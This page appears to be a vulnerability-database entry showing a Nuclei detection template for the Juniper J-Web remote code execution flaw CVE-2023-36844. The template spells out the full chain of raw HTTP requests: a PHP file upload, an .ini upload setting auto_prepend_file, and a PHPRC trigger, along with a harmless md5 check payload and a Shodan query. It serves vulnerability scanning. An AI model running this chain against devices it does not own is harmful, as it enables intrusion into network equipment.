Juniper Devices - Remote Code Execution

🗓️ 03 Jul 2026 13:39:16 | Reported by ProjectDiscovery | Type: nuclei | 🔗 github.com

Juniper Devices PHP vulnerability allows Remote Code Execution

Code
id: CVE-2023-36844

info:
  name: Juniper Devices - Remote Code Execution
  author: princechaddha,ritikchaddha
  severity: medium
  description: |
    Multiple cves in Juniper Network (CVE-2023-36844|CVE-2023-36845|CVE-2023-36846|CVE-2023-36847).A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environments variables. Utilizing a crafted request an attacker is able to modify certain PHP environments variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected Juniper Devices.
  remediation: |
    Apply the latest security patches and firmware updates provided by Juniper Networks to mitigate this vulnerability.
  reference:
    - https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/
    - https://github.com/watchtowrlabs/juniper-rce_cve-2023-36844
    - https://supportportal.juniper.net/JSA72300
    - http://packetstormsecurity.com/files/174397/Juniper-JunOS-SRX-EX-Remote-Code-Execution.html
    - http://packetstormsecurity.com/files/174865/Juniper-SRX-Firewall-EX-Switch-Remote-Code-Execution.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2023-36844
    cwe-id: CWE-473
    epss-score: 0.89628
    epss-percentile: 0.99772
    cpe: cpe:2.3:h:juniper:srx100:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: juniper
    product: srx100
    shodan-query: title:"Juniper Web Device Manager"
  tags: cve2023,cve,packetstorm,juniper,php,rce,intrusive,fileupload,kev,vkev,vuln
variables:
  string: "CVE-2023-36844"
  payload: "('<?php echo md5('{{string}}');unlink(__FILE__);?>')"

http:
  - raw:
      - |
        POST /webauth_operation.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        rs=do_upload&rsargs[]=[{"fileData": "data:text/html;base64,{{base64(payload)}}", "fileName": "{{rand_base(5, "abc")}}.php", "csize": {{len(payload)}}}]
      - |
        POST /webauth_operation.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        rs=do_upload&rsargs[]=[{"fileName": "{{rand_base(5, "abc")}}.ini", "fileData": "data:text/html;base64,{{base64(concat('auto_prepend_file=',hex_decode('22'),'/var/tmp/',phpfile,hex_decode('22')))}}", "csize": "97" }]
      - |
        GET /webauth_operation.php?PHPRC=/var/tmp/{{inifile}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '"original_fileName":'
          - '"converted_fileName":'
        condition: and

      - type: word
        part: body_3
        words:
          - '{{md5(string)}}'

    extractors:
      - type: regex
        part: body_1
        name: phpfile
        regex:
          - "([a-f0-9]{64}\\.php)"
        internal: true

      - type: regex
        part: body_2
        name: inifile
        regex:
          - "([a-f0-9]{64}\\.ini)"
        internal: true
# digest: 4b0a004830460221008e1ae51a4140037c62c0999231cdba4f7b8e4aeed60f9ed425dfa5fc4289626f022100d5f35d58c6296cab34e4a6a3cdfa447697aba2ef5c8695a5e9541dd8ad4fe3eb:922c64590222798bb761d5b6d8e72950


04 Feb 2026 07:00 (Current)
Vulners AI Score: 7 (High risk)
CVSS 3.1: 5.3 - 9.8
EPSS: 0.94205